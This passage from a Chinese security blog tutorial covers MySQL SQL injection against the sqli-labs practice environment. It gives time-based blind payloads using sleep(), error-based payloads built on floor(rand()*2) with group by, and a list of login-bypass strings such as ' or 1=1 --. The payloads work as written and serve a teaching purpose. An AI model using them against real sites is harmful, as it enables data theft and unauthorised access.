<h5 id="猜表的长度"><a href="#猜表的长度" class="headerlink" title="猜表的长度"></a>猜表的长度</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(length(substr((<span class="keyword">select</span> <span class="built_in">table_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">6</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) <span class="comment">--+</span></span><br><span class="line">如果猜第二个表的长度就替换<span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h5 id="猜表名的第一个字符-1"><a href="#猜表名的第一个字符-1" class="headerlink" title="猜表名的第一个字符"></a>猜表名的第一个字符</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(ascii(substr((<span class="keyword">select</span> <span class="built_in">table_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">101</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) <span class="comment">--+</span></span><br><span class="line">如果猜表名的第二个字符就替换 substr(*,<span class="number">2</span>,<span class="number">1</span>)</span><br><span class="line">如果猜第二个表名的第一个字符就替换 <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h4 id="猜列-1"><a href="#猜列-1" class="headerlink" title="猜列"></a>猜列</h4><h5 id="猜列的数量-1"><a href="#猜列的数量-1" class="headerlink" title="猜列的数量"></a>猜列的数量</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>((<span class="keyword">select</span> count(<span class="built_in">column_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">'users'</span>)=<span class="number">3</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) <span class="comment">--+</span></span><br><span class="line">因为已知表名 所以直接查</span><br></pre></td></tr></table></figure>
<h5 id="猜第一个列名的长度-1"><a href="#猜第一个列名的长度-1" class="headerlink" title="猜第一个列名的长度"></a>猜第一个列名的长度</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(length(substr((<span class="keyword">select</span> <span class="built_in">column_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">2</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) <span class="comment">--+</span></span><br><span class="line">如果猜第二个列的长度就替换<span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h5 id="猜第一个列名的第一个字符-1"><a href="#猜第一个列名的第一个字符-1" class="headerlink" title="猜第一个列名的第一个字符"></a>猜第一个列名的第一个字符</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(ascii(substr((<span class="keyword">select</span> <span class="built_in">column_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">105</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) <span class="comment">--+</span></span><br><span class="line">如果猜列名的第二个字符就替换 substr(*,<span class="number">2</span>,<span class="number">1</span>)</span><br><span class="line">如果猜第二个列名的第一个字符就替换 <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h4 id="猜数据-1"><a href="#猜数据-1" class="headerlink" title="猜数据"></a>猜数据</h4><h5 id="猜数据的数量-1"><a href="#猜数据的数量-1" class="headerlink" title="猜数据的数量"></a>猜数据的数量</h5><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and if((<span class="name">select</span> count(列名) from 表名)=13,sleep(<span class="number">5</span>),<span class="number">1</span>) --+</span><br></pre></td></tr></table></figure>
<h5 id="猜第一个数据的长度-1"><a href="#猜第一个数据的长度-1" class="headerlink" title="猜第一个数据的长度"></a>猜第一个数据的长度</h5><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(length(substr((select username <span class="keyword">from</span><span class="built_in"> users </span>limit 0,1),1))=4,sleep(5),1) --+</span><br><span class="line">如果猜第二个数据的长度就替换limit 1,1</span><br></pre></td></tr></table></figure>
<h5 id="猜第一个数据的第一个字符-1"><a href="#猜第一个数据的第一个字符-1" class="headerlink" title="猜第一个数据的第一个字符"></a>猜第一个数据的第一个字符</h5><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(ascii(substr((select username <span class="keyword">from</span> users limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">68</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) --+</span><br><span class="line">如果要猜第一个数据的第二个字符就把substr(*,<span class="number">2</span>,<span class="number">1</span>)替换</span><br><span class="line">如果要猜第二个数据的第一个字符就替换limit <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h2 id="基于错误的注入"><a href="#基于错误的注入" class="headerlink" title="基于错误的注入"></a>基于错误的注入</h2><p>MySQL报错注入通过构造payload让信息通过错误提示回显出来，主要应用与查询不回现内容，会打印错误信息；Update、insert等语句，会打印错误的信息。</p>
<h3 id="报错注入所用函数"><a href="#报错注入所用函数" class="headerlink" title="报错注入所用函数"></a>报错注入所用函数</h3><p>需用到四个函数和一个group by语句：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">group by ...	---&gt;分组语句 <span class="comment">//将查询的结果分类汇总</span></span><br><span class="line"><span class="function"><span class="title">rand</span><span class="params">()</span></span>	---&gt;随机数生成函数</span><br><span class="line"><span class="function"><span class="title">floor</span><span class="params">()</span></span>	---&gt;取整函数 <span class="comment">//用来对生成的随机数取整</span></span><br><span class="line"><span class="function"><span class="title">concat</span><span class="params">()</span></span>	---&gt;连接字符串</span><br><span class="line"><span class="function"><span class="title">count</span><span class="params">()</span></span>	---&gt;统计函数 <span class="comment">//结合group by语句统计分组后的数据</span></span><br></pre></td></tr></table></figure>
<h3 id="讲解"><a href="#讲解" class="headerlink" title="讲解"></a>讲解</h3><pre><code>执行查询操作时，子查询先开始，所以SELECT database()先执行，然后查询到当前数据库名称”security“，并将其传给concat函数，concat函数在对字符进行连接，
然后是rand()函数，其作用是生成一个大于0小于1的随机浮点数
floor()函数的作用是对传入的参数取整，这里将rand()生成的随机数做处理进行取整，由于rand()生成的值取整结果只能为0，所以我们这里做一点处理，使其生成一个大于0小于2的随机值，并对其取整
加上group by语句对返回的数据进行分组处理
from前的as a，是为concat((SELECT database()), floor(rand()*2))这一串取了个别名，后面使用group by分组时就不用打那么长一串了，直接使用别名就行。
在sqli-labs第五关这样网页无回显的环境下，我们是看不到任何的信息的，所以接下来才是正题，我们要利用count函数和上面的操作构成mysql内部错误，然后通过报错的提示获得我们想要的信息。
(上面的database()函数在实际注入中也可以换成其他的，如version()，具体看你想要通过报错获得的信息)
这里增加一个聚合函数count，构造的语句如下：
mysql&gt; SELECT count(*),concat((SELECT database()), floor(rand()*2))as a from information_schema.schemata group by a;
这里利用count(*)对前面的返回数据进行统计，由于group by 和随机数的原因，有可能会出现重复的键值，当键值重复时就会触发错误，然后报错，由于子查询在错误发生之前就已经完成，所以子查询的内容会随着报错信息一起显示出来：
这里我使用的是information_schema中的schemata表，因为我的数据库有7个，生成的随机结果中0和1有一定比例，不容易出现全是0或者全是1的情况，实际情况下推荐使用information_schema中的tables或者columns两个表，里面的数据条目较多，容易生成较多的随机值。
例如：
mysql&gt; SELECT count(*), concat((SELECT database()), floor(rand()*2))as a from information_schema.tables group by a;</code></pre><h3 id="报错注入过程"><a href="#报错注入过程" class="headerlink" title="报错注入过程"></a>报错注入过程</h3><h4 id="暴库"><a href="#暴库" class="headerlink" title="暴库"></a>暴库</h4><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,count(*),concat((<span class="keyword">select</span> <span class="keyword">database</span>()),floor(rand(<span class="number">0</span>)*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<h4 id="爆表"><a href="#爆表" class="headerlink" title="爆表"></a>爆表</h4><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,count(*),concat((<span class="keyword">select</span> <span class="built_in">table_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),floor(rand(<span class="number">0</span>)*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br><span class="line">查第二个表就替换<span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h4 id="爆列"><a href="#爆列" class="headerlink" title="爆列"></a>爆列</h4><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,count(*),concat((<span class="keyword">select</span> <span class="built_in">column_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">'user'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),floor(rand(<span class="number">0</span>)*<span class="number">2</span>)) <span class="keyword">as</span> a <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">group</span> <span class="keyword">by</span> a <span class="comment">--+</span></span><br><span class="line">查第二个列就替换<span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h4 id="爆数据"><a href="#爆数据" class="headerlink" title="爆数据"></a>爆数据</h4><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">union select 1,count(*),concat((select username <span class="keyword">from</span><span class="built_in"> users </span>limit 0,1),floor(rand(0)<span class="number">*2</span>)) as a <span class="keyword">from</span> information_schema.tables<span class="built_in"> group </span>by a --+</span><br><span class="line">查第二个数据就替换limit 1,1</span><br></pre></td></tr></table></figure>
<h3 id="绕过验证-常见的为管理登陆-也称万能密码"><a href="#绕过验证-常见的为管理登陆-也称万能密码" class="headerlink" title="绕过验证(常见的为管理登陆)也称万能密码"></a>绕过验证(常见的为管理登陆)也称万能密码</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">(<span class="number">1</span>) 用户名输入： 'or <span class="number">1</span>=<span class="number">1</span> or'  密码：任意</span><br><span class="line">(<span class="number">2</span>) Admin' -- (或'or <span class="number">1</span>=<span class="number">1</span> or' --)(admin or <span class="number">1</span>=<span class="number">1</span> --) (MSSQL)(直接输入用户名，不进行密码验证)</span><br><span class="line">(<span class="number">3</span>) 用户名输入：admin   密码输入：' or '<span class="number">1</span>'='<span class="number">1</span>  也可以</span><br><span class="line">(<span class="number">4</span>) 用户名输入：admin' or 'a'='a    密码输入：任意</span><br><span class="line">(<span class="number">5</span>) 用户名输入：' or <span class="number">1</span>=<span class="number">1</span> --</span><br><span class="line">(<span class="number">6</span>) 用户名输入：admin' or <span class="number">1</span>=<span class="number">1</span> --  密码输入：任意</span><br><span class="line">(<span class="number">7</span>) 用户名输入：<span class="number">1</span>'or'<span class="number">1</span>'='<span class="number">1</span>'or'<span class="number">1</span>'='<span class="number">1</span>   密码输入：任意</span><br></pre></td></tr></table></figure>
    </div>

    
    
    
        <div>
            
            <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
            
        </div>
      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag"># SQL注入</a>
          </div>


        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/fc2bb35a.html" rel="prev" title="ms17-010永恒之蓝复现">
      <i class="fa fa-chevron-left"></i> ms17-010永恒之蓝复现
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/366383bb.html" rel="next" title="Nmap">
      Nmap <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#了解SQL注入"><span class="nav-number">1.</span> <span class="nav-text">了解SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#什么是SQL注入"><span class="nav-number">1.1.</span> <span class="nav-text">什么是SQL注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入的危害"><span class="nav-number">1.2.</span> <span class="nav-text">SQL注入的危害</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL的类型"><span class="nav-number">1.3.</span> <span class="nav-text">SQL的类型</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#按照注入点分类"><span class="nav-number">1.3.1.</span> <span class="nav-text">按照注入点分类</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#按照执行效果来分类"><span class="nav-number">1.3.2.</span> <span class="nav-text">按照执行效果来分类</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#按照数据请求方式来分类"><span class="nav-number">1.3.3.</span> <span class="nav-text">按照数据请求方式来分类</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MySQL常用的系统函数"><span class="nav-number">2.</span> <span class="nav-text">MySQL常用的系统函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#联合查询注入"><span class="nav-number">3.</span> <span class="nav-text">联合查询注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#联合注入所用函数"><span class="nav-number">3.1.</span> <span class="nav-text">联合注入所用函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#information-schema数据库说明"><span class="nav-number">3.2.</span> <span class="nav-text">information_schema数据库说明</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#联合注入的过程"><span class="nav-number">3.3.</span> <span class="nav-text">联合注入的过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#判断注入点"><span class="nav-number">3.3.1.</span> <span class="nav-text">判断注入点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断是整型还是字符型"><span class="nav-number">3.3.2.</span> <span class="nav-text">判断是整型还是字符型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断查询列数"><span class="nav-number">3.3.3.</span> <span class="nav-text">判断查询列数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#判断显示位"><span class="nav-number">3.3.4.</span> <span class="nav-text">判断显示位</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#获取所有数据库名"><span class="nav-number">3.3.5.</span> <span class="nav-text">获取所有数据库名</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#猜表名的第一个字符"><span class="nav-number">3.3.5.1.</span> <span class="nav-text">猜表名的第一个字符</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#猜列"><span class="nav-number">3.3.6.</span> <span class="nav-text">猜列</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#猜列的数量"><span class="nav-number">3.3.6.1.</span> <span class="nav-text">猜列的数量</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个列名的长度"><span class="nav-number">3.3.6.2.</span> <span class="nav-text">猜第一个列名的长度</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个列名的第一个字符"><span class="nav-number">3.3.6.3.</span> <span class="nav-text">猜第一个列名的第一个字符</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#猜数据"><span class="nav-number">3.3.7.</span> <span class="nav-text">猜数据</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#猜数据的数量"><span class="nav-number">3.3.7.1.</span> <span class="nav-text">猜数据的数量</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个数据的长度"><span class="nav-number">3.3.7.2.</span> <span class="nav-text">猜第一个数据的长度</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个数据的第一个字符"><span class="nav-number">3.3.7.3.</span> <span class="nav-text">猜第一个数据的第一个字符</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于时间的盲注"><span class="nav-number">4.</span> <span class="nav-text">基于时间的盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#时间盲注所用函数"><span class="nav-number">4.1.</span> <span class="nav-text">时间盲注所用函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#时间盲注过程"><span class="nav-number">4.2.</span> <span class="nav-text">时间盲注过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#检测注入"><span class="nav-number">4.2.1.</span> <span class="nav-text">检测注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#猜数据库名的第一个字符"><span class="nav-number">4.2.1.1.</span> <span class="nav-text">猜数据库名的第一个字符</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#猜表"><span class="nav-number">4.2.2.</span> <span class="nav-text">猜表</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#猜表的数量"><span class="nav-number">4.2.2.1.</span> <span class="nav-text">猜表的数量</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜表的长度"><span class="nav-number">4.2.2.2.</span> <span class="nav-text">猜表的长度</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜表名的第一个字符-1"><span class="nav-number">4.2.2.3.</span> <span class="nav-text">猜表名的第一个字符</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#猜列-1"><span class="nav-number">4.2.3.</span> <span class="nav-text">猜列</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#猜列的数量-1"><span class="nav-number">4.2.3.1.</span> <span class="nav-text">猜列的数量</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个列名的长度-1"><span class="nav-number">4.2.3.2.</span> <span class="nav-text">猜第一个列名的长度</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个列名的第一个字符-1"><span class="nav-number">4.2.3.3.</span> <span class="nav-text">猜第一个列名的第一个字符</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#猜数据-1"><span class="nav-number">4.2.4.</span> <span class="nav-text">猜数据</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#猜数据的数量-1"><span class="nav-number">4.2.4.1.</span> <span class="nav-text">猜数据的数量</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个数据的长度-1"><span class="nav-number">4.2.4.2.</span> <span class="nav-text">猜第一个数据的长度</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#猜第一个数据的第一个字符-1"><span class="nav-number">4.2.4.3.</span> <span class="nav-text">猜第一个数据的第一个字符</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于错误的注入"><span class="nav-number">5.</span> <span class="nav-text">基于错误的注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#报错注入所用函数"><span class="nav-number">5.1.</span> <span class="nav-text">报错注入所用函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#讲解"><span class="nav-number">5.2.</span> <span class="nav-text">讲解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#报错注入过程"><span class="nav-number">5.3.</span> <span class="nav-text">报错注入过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#暴库"><span class="nav-number">5.3.1.</span> <span class="nav-text">暴库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#爆表"><span class="nav-number">5.3.2.</span> <span class="nav-text">爆表</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#爆列"><span class="nav-number">5.3.3.</span> <span class="nav-text">爆列</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#爆数据"><span class="nav-number">5.3.4.</span> <span class="nav-text">爆数据</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过验证-常见的为管理登陆-也称万能密码"><span class="nav-number">5.4.</span> <span class="nav-text">绕过验证(常见的为管理登陆)也称万能密码</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Timor"
      src="/images/xiaobai.jpg">
  <p class="site-author-name" itemprop="name">Timor</p>
  <div class="site-description" itemprop="description">渗透测试|网络安全|信息安全|WEB安全</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/timorblog" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;timorblog" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        
  <div class="beian"><a href="http://www.beian.miit.gov.cn/" rel="noopener" target="_blank">辽ICP备19000813号-1 </a>|
      <img src="/images/beian.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=21071102000174" rel="noopener" target="_blank">辽公网安备 21071102000174号 </a>
  </div>

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Timor</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      bp.src = (curProtocol === 'https') ? 'https://zz.bdstatic.com/linksubmit/push.js' : 'http://push.zhanzhang.baidu.com/push.js';
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>




  
<script src="/js/local-search.js"></script>













  

  

 <!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/clicklove.js">
  
</script>
</body>
</html>
